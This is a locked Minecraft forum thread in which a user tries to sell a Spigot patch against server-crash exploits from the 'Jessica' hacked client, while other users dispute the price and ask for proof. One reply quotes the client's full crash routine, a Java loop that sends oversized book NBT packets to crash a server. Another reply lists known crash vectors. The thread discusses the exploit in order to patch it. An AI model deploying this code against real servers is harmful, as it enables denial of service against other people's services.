Spigot Patch (class or spigot) | Anti crasher | Jessica and private exploits

Status
This thread has been locked.

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
I've seen many people (two or three) requesting this so yeah, decided to sell this. If you want to test if it works I can give you the client or you can join my test server with it and try to crash it, just send me a pm!

This spigot patch contains a fix for four exploits that you can use to lag or crash big servers like minemen, lunar, faithful or viper.

0c5c515955caa88f2ca665b35a29bed0.png


Note: I'll be selling the java class or the spigot with the fix
2nd note: There is not a price set, I will deal the price with each user depending on their needs (somewhere around 60€)
 
Last edited:
PebbleHost
High performance, consistent uptime and fast support. Minecraft hosting that just works.

Scifi

Supreme
Feedback score
4
Posts
577
Reactions
208
Resources
4
which methods are you even trying to stop? //calc & //eval ? you should really specify also you should provide proof of ownership / code snippets
 

LillianA

beep boop
Premium
Feedback score
7
Posts
347
Reactions
259
Resources
0
which methods are you even trying to stop? //calc & //eval ? you should really specify also you should provide proof of ownership / code snippets
It's for the "Jessica" client (see title)

Basically a lot of people can't figure out how to fix it and it probably isn't that hard to fix

//EDIT: There are a couple different methods the client uses but this is one of them
General code for the crash
Code:
Wrapper.msg("Attack!", true);
            ItemStack bookObj = new ItemStack(Items.WRITABLE_BOOK);
            NBTTagList list = new NBTTagList();
            NBTTagCompound tag = new NBTTagCompound();
            String author = Minecraft.getMinecraft().getSession().getUsername();
            String title = "Title";
            String size = "wveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5";
            for (int i = 0; i < 50; i++)
            {
              String siteContent = size;
              NBTTagString tString = new NBTTagString(siteContent);
              list.appendTag(tString);
            }
            tag.setString("author", author);
            tag.setString("title", title);
            tag.setTag("pages", list);
            bookObj.setTagInfo("pages", list);
            bookObj.setTagCompound(tag);
            for (;;)
            {
              Wrapper.sendPacket(new CPacketClickWindow(0, 0, 0, ClickType.PICKUP, bookObj, (short)0));
              Thread.sleep(12L);
            }
 

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
To even have a shot at selling plugins here you'll need:
- Code proof
- A price
- An actual description explaining what your plugin does
If you decide a price let me know

Yes, this is a method that stops all the jessica client crashes, I don't know a price but should be around 70€ or so. Also, I can't provide code proof because I would be spoiling the method to fix the crash.
 

LillianA

beep boop
Premium
Feedback score
7
Posts
347
Reactions
259
Resources
0
I've never even heard of the Jessica client until now. What is it exactly?
Most of it is pretty bad but it has 3 commands that crash the server with the help of books (see my above message for code to one of the commands) and people can't figure out how to patch it for some reason.
 

Reachouts

Restricted
Feedback score
2
Posts
54
Reactions
28
Resources
0
Yes, this is a method that stops all the jessica client crashes, I don't know a price but should be around 70€ or so. Also, I can't provide code proof because I would be spoiling the method to fix the crash.
If 70€ is EURO (Just going off of google) That is way to much ~78 USD This could very easily be done for just about free.
 

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
If 70€ is EURO (Just going off of google) That is way to much ~78 USD This could very easily be done for just about free.
It's a fix that works some exploits that can even crash servers like MMC or PvPTemple if you modify the client a bit
 

UltimateIsMid

Server Owner
Premium
Feedback score
2
Posts
46
Reactions
28
Resources
1
there are literally multiple free plugins on another website that fixes this client's crasher... yet it's being sold for.. €60? daylight robbery right here
 

kampai

Feedback score
8
Posts
361
Reactions
187
Resources
0
there are literally multiple free plugins on another website that fixes this client's crasher... yet it's being sold for.. €60? daylight robbery right here
You gave no evidence to back up this claim, and yet you still decided to post it?... Wow... the ignorance.

Please stop trashing other people's threads, and can you provide any proof that these crash fixers even exist?
 

manny

Developer
Supreme
Feedback score
12
Posts
501
Reactions
308
Resources
0
Most of these crashes are easy to fix, selling for ~$70 is outrageous.
 

manny

Developer
Supreme
Feedback score
12
Posts
501
Reactions
308
Resources
0
I don't think they are easy to fix since I can crash Minemen, Lunar or Faithful
Most of the notable crashes:
  • health attribute
  • invalid yaw
  • invalid pitch
  • invalid position
  • sign (packet data)
All of these have been patched on most servers. I don't believe its functionality and want to see if it actually works
PM @AgentManny (tele)
 

Receiver

Feedback score
1
Posts
44
Reactions
10
Resources
0
Update, will be selling three fixes, not just the Jessica Client one.
 
Last edited:
Status
This thread has been locked.
Top